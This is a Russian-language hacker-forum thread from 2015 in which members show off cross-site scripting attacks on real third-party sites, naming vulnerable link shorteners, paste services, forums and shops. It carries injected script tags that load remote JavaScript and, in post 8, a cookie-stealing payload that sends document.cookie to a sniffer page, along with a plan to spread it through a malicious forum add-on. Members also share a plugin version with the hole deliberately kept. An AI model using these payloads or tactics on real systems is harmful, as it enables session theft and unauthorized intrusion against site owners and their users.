1. На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Скрыть объявление
Привет, Незнакомец! У тебя есть возможность Оставить комментарий в теме

<script>alert('Межсайтовый нежданчик')</script>

Тема в разделе "H4X S0FTW4RE", создана пользователем SrDEN, 26 июн 2015.

Метки:
Страница 1 из 2

  1. SrDEN IPv6

    SrDEN
    TS
    Команда форума WebVoice
    Регистрация:
    14 мар 2007
    Сообщения:
    621
    Симпатии:
    23
    ICQ:
    162224
    Давно хотел создать подобную тему, есть Лента дефейсов, а это будет своего рода лентой XSS-ейсов :)

    Бывает такое, что разработчики плохо фильтруют входящие данные, либо вообще этого не делают, а некоторые даже и не все места предугадывают, откуда это может прийти...

    В этой теме предлагаю делится подобными проектами, где у вас получилось провести атаку, желательно со скриншотами, а лучше даже видео записать. По сложившейся вебкриминальной традиции, мы любим засовывать harlem-shake
    Код:
    <script src="http://webcriminal.ru/files/hshake.js"></script>
    вы тоже можете её продолжить, либо придумать что-то еще.

    Приветствуются нестандартные атаки!

    Начинаю. Сервис укорачиватель ссылок от xakeroker.ws -> xkrk.cf
    На главной уже нету, вот остались примеры:
    http://xkrk.cf/hello
    http://xkrk.cf/h4x

    Ну и собственно видео:


    В данном случае, входящие данные вообще не фильтровались, все что отсылалось, появлялось на главной.
     
    SrDEN, 26 июн 2015
    #1 + Цитата Ответить
    Rufus, WebGirl, ddd и ещё 1-му нравится это.

  2. X-Oleg 8айтовый

    X-Oleg
    WebVoice
    Регистрация:
    25 июн 2015
    Сообщения:
    102
    Симпатии:
    62
    Прикольно !:websmiles_50:
     
    X-Oleg, 26 июн 2015
    #2 + Цитата Ответить

  3. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Вот еще oip.cc, как-то у нас на форуме проскакивал:


    Но тут только себя повеселишь, т.к. как кроме как видео или скриншота не показать, зато входящие данные из неожиданного места :)
     
    ddd, 26 июн 2015
    #3 + Цитата Ответить
    WebGirl и X-Oleg нравится это.

  4. SrDEN IPv6

    SrDEN
    TS
    Команда форума WebVoice
    Регистрация:
    14 мар 2007
    Сообщения:
    621
    Симпатии:
    23
    ICQ:
    162224
    Еще одна XSS-отека у xakeroker в этот раз на paste.xakeroker.in


    Итог, не проверяют ребята скрипты перед установкой...
    P.S. там у них еще есть, но больше лезть не буду :)
     
    SrDEN, 28 июн 2015
    #4 + Цитата Ответить
    WebGirl и X-Oleg нравится это.

  5. X-Oleg 8айтовый

    X-Oleg
    WebVoice
    Регистрация:
    25 июн 2015
    Сообщения:
    102
    Симпатии:
    62
    Да это паблик скрипты, которые сделаны "На коленках", у меня есть архив по мойму из 100 скриптов: Там всякие файлообменники, парсинг музыки из Вконтакте и т.д.

    Было время хотел файлообменник сделать, глянул, та-же хрень с XSS в этоге удалил...:websmiles_53:

    А так эти XSS могут-быть достаточно опасными, можно протроянить админов, ну или вставить туда рекламу и иметь профит с их сервисов, гы-гы...:websmiles_04:
     
    X-Oleg, 28 июн 2015
    #5 + Цитата Ответить
    WebGirl нравится это.

  6. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Конечно, еслиб вместо алертов и дискотеки вставили код позловещей, то это все провисело на много дольше и успело скомпрометировать всё и вся :)
     
    ddd, 28 июн 2015
    #6 + Цитата Ответить
    WebGirl нравится это.

  7. X-Oleg 8айтовый

    X-Oleg
    WebVoice
    Регистрация:
    25 июн 2015
    Сообщения:
    102
    Симпатии:
    62
    Хе, как-то писал плагин Доната для XenForo, и вот что получилось, смотрим ролик:



    Вот вопрос, а насколько это опасно в моём случае ? Т.е. нужно-ли выпускать секюрити фикс ?

    Ведь проэксплуатировать это практически нереально, данные берутся тоько после нажатия на кнопку "Оплатить" Post-запросом !

    Кстати фиксится легко, если был такой код:

    Код:
    if (isset($_POST['mytext']))
{
    $Pay_Interkassa=$_POST['mytext']; //Получаем сколько нужно оплатить из формы доната...
}
else
{
    echo 'Dont Worked ! :)';
    exit();
};
    Как видите $Pay_Interkassa никак не экранируется, фиксим при помощи filter_var($Pay_InterkassaGet,FILTER_SANITIZE_NUMBER_FLOAT)...

    FILTER_SANITIZE_NUMBER_FLOAT - Это и есть фильтр в пхп, т.е. нам-же нужны только числа, тупо всё порежит...

    Правленный код:

    Код:
    if (isset($_POST['mytext']))
{
    $Pay_InterkassaGet=$_POST['mytext']; //Получаем сколько нужно оплатить из формы доната...
   
    $Pay_Interkassa=filter_var($Pay_InterkassaGet,FILTER_SANITIZE_NUMBER_FLOAT); //Экранируем, чтобы не было XSS
}
else
{
    echo 'Dont Worked ! :)';
    exit();
};
    Вопрос, реально-ли проэксплуатировать такую XSS и как ?
     
    X-Oleg, 29 июн 2015
    #7 + Цитата Ответить
    Rufus и WebGirl нравится это.

  8. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Конечно реально, если на сайте есть известная вам XSS, то её надо сразу же исправлять, если не знаете как, то отключать.

    Данную уязвимость можно поэксплуатировать с далека. Допустим написать пользовательский скрипт допустим для greasemonkey(хотя в нашем случае это не то)лучше дополнение для форума, которое будет какой-то наворот добавлять, люди поставят(сперва правда проверят), через пару дополнений пихаем код, который после нажатия кнопки Пожертвовать, добавляет в val инпута код:
    Код:
    <script>document.location.replace('http://webcriminal.ru/snifer.php?nyama='+document.cookie)</script>
    Пользователь даже нечего и не заметит, а наш снифер получит его куки.
    Сценарий конечно на грани фантастики, но имеет место быть.

    P.S. многие недооценивают опасность XSS... в общем была бы дырка, а как её проэксплуатировать мы найдем :)

    P.S2. скрипт можно вставить не в таком явном виде
     
    ddd, 29 июн 2015
    #8 + Цитата Ответить
    X-Oleg и WebGirl нравится это.

  9. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    @X-Oleg нашел ваш плагин, вернул XSS и развернул всё это дело на локалке. Далее воспроизвел на видео как это могло все произойти. В роли обезьянки\единорогского дополнения, будет выступать простой редактор JS. Думаю все наглядно :)



    СИ + минимальные навыки программирования = гремучая смесь :)
     
    ddd, 29 июн 2015
    #9 + Цитата Ответить
    X-Oleg, Rufus и WebGirl нравится это.

  10. X-Oleg 8айтовый

    X-Oleg
    WebVoice
    Регистрация:
    25 июн 2015
    Сообщения:
    102
    Симпатии:
    62
    Вернёмся к хакрокерам, уязвимость на форуме теперь:

     
    X-Oleg, 30 июн 2015
    #10 + Цитата Ответить
    ddd, Rufus и Infoman нравится это.

  11. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    @X-Oleg интересно там активная xss? Если тему создать с таким тегом, то прыгала бы главная для всех пользователей :)

    P.S. наверное уже исправили, так как эту тему скорее всего хакерокеры уже мониторят :)
    P.S2. надо подобный плагин на локалке поставить и потестить, да и вообще глянуть популярные плагины для ксении, из-за простоты движка, их пишут все кому не лень, и скорее всего про фильтрацию, большинство плагинописателей не чего не слышали :)
     
    ddd, 30 июн 2015
    #11 + Цитата Ответить
    X-Oleg нравится это.

  12. Rufus Б4йтовый

    Rufus
    WebVoice
    Регистрация:
    27 июн 2015
    Сообщения:
    40
    Симпатии:
    31
    Jabber:
    inferno@securejabber.me
    ICQ:
    714591196
    В последней версии ксентага-баг пофикшен.
    А всё началось отсюда:https://bhf.su/threads/150267/
     
    Rufus, 30 июн 2015
    #12 + Цитата Ответить
    WebGirl и X-Oleg нравится это.

  13. X-Oleg 8айтовый

    X-Oleg
    WebVoice
    Регистрация:
    25 июн 2015
    Сообщения:
    102
    Симпатии:
    62
    Да именно от туда и узнал, уязвимость очень неприятная, вот что можно-было сделать, если-бы я был злодеем:

    1. Редактирование профилей;

    2.Создание тем от имени пользователя;

    3.Можно даже попробовать было прочитать ЛС при помощи этого лага...

    Ещё немножко добавлю про куки, кроме httpOnly, в ксене если не делать "Запомнить меня" идёт привязка к айпишнику, поэтому кража кук ещё может непомочь, правда если стоит галочка "Запомнить меня", тогда-да могут-быть проблемы ! :(

    Вот если нужно во вложении два версии этого плагина: Профиксенная и с XSS ! :)
     

    Вложения:

    • Tags.zip
      Размер файла:
      242,4 КБ
      Просмотров:
      121
    X-Oleg, 1 июл 2015
    #13 + Цитата Ответить
    WebGirl и Rufus нравится это.

  14. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    @X-Oleg отлично, если на выходных будет плохая погода, то проверю свою теорию + попробую устроить атаку еще на один популярный плагин :)
     
    ddd, 1 июл 2015
    #14 + Цитата Ответить
    WebGirl нравится это.

  15. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Посты о хакерокерах перенесу сюда, чтоб в этой теме оффтоп не разводить.

    Ну и Апну тему XSS-кой в Spam Art table text generator-е



    Натолкнулся на него случайно, и решил от делать нечего написать новый скрипт, который меняет размеры ячейкам таблицы и на фоне играет 8bit ковер на Prodigy: http://webcriminal.ru/files/table8bit.js

    Скрипт писал на коленке, по этому он вряд ли универсальный, возможно потом допилю. На данный момент он находит первую таблицу, оставляет максимум 100 столбцов таблицы, и потом начинает рандом менять размеры ячеек и все это под 8bit :)

    P.S. надо будет тему создать, для подобных скриптов. Лет 5-ть назад, обещался @2FED написать статью про красивые дефейсы с помощью js :websmiles_26:
     
    ddd, 9 июл 2015
    #15 + Цитата Ответить
    Rufus и X-Oleg нравится это.

  16. Rufus Б4йтовый

    Rufus
    WebVoice
    Регистрация:
    27 июн 2015
    Сообщения:
    40
    Симпатии:
    31
    Jabber:
    inferno@securejabber.me
    ICQ:
    714591196
    Твой не фикшенный аддон по душе ребятам.И главное,что каждый день у нас сидят,но в упор не видят твоей обновы.
    http://over-code.ru/
    и в магазинчике тоже xss гуляет
    http://bill.shopsu.ru/reg.php
    11.gif
     
    Последнее редактирование: 13 июл 2015
    Rufus, 12 июл 2015
    #16 + Цитата Ответить

  17. Rufus Б4йтовый

    Rufus
    WebVoice
    Регистрация:
    27 июн 2015
    Сообщения:
    40
    Симпатии:
    31
    Jabber:
    inferno@securejabber.me
    ICQ:
    714591196
    На одном форуме,обнаружилась вот такая подборка.В xentag и в донате от Кесаева.

    Админ этого форума-старый ксеновод,поэтому я предупредил его о возможных неприятностях)
    Кстати с донатом имеются проблемы и здесь:
    https://delhack.net/
     
    Rufus, 23 июл 2015
    #17 + Цитата Ответить
    ddd нравится это.

  18. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Надо было веселей его предупредить :) дал бы ссылку на xss, чтоб он сообщение от своего имени написал, под шарлем шейк, ну или другую мелодию :)
     
    ddd, 23 июл 2015
    #18 + Цитата Ответить
    Rufus нравится это.

  19. Rufus Б4йтовый

    Rufus
    WebVoice
    Регистрация:
    27 июн 2015
    Сообщения:
    40
    Симпатии:
    31
    Jabber:
    inferno@securejabber.me
    ICQ:
    714591196
    Толком проэксплуатировать эту хрень,я увы не смог из-за отсутствия опыта:websmiles_06:.Повозился с составлением запроса,но в итоге облом.
     
    Rufus, 23 июл 2015
    #19 + Цитата Ответить

  20. Rufus Б4йтовый

    Rufus
    WebVoice
    Регистрация:
    27 июн 2015
    Сообщения:
    40
    Симпатии:
    31
    Jabber:
    inferno@securejabber.me
    ICQ:
    714591196
    Админ оказался нестандартным)Вместо того,чтобы закрывать дыры,он их понёс к соседям..
    http://chitachok.ru/threads/vazhno.35238/
    https://bhf.su/threads/162944/
     
    Rufus, 27 июл 2015
    #20 + Цитата Ответить
Ответить в теме
Страница 1 из 2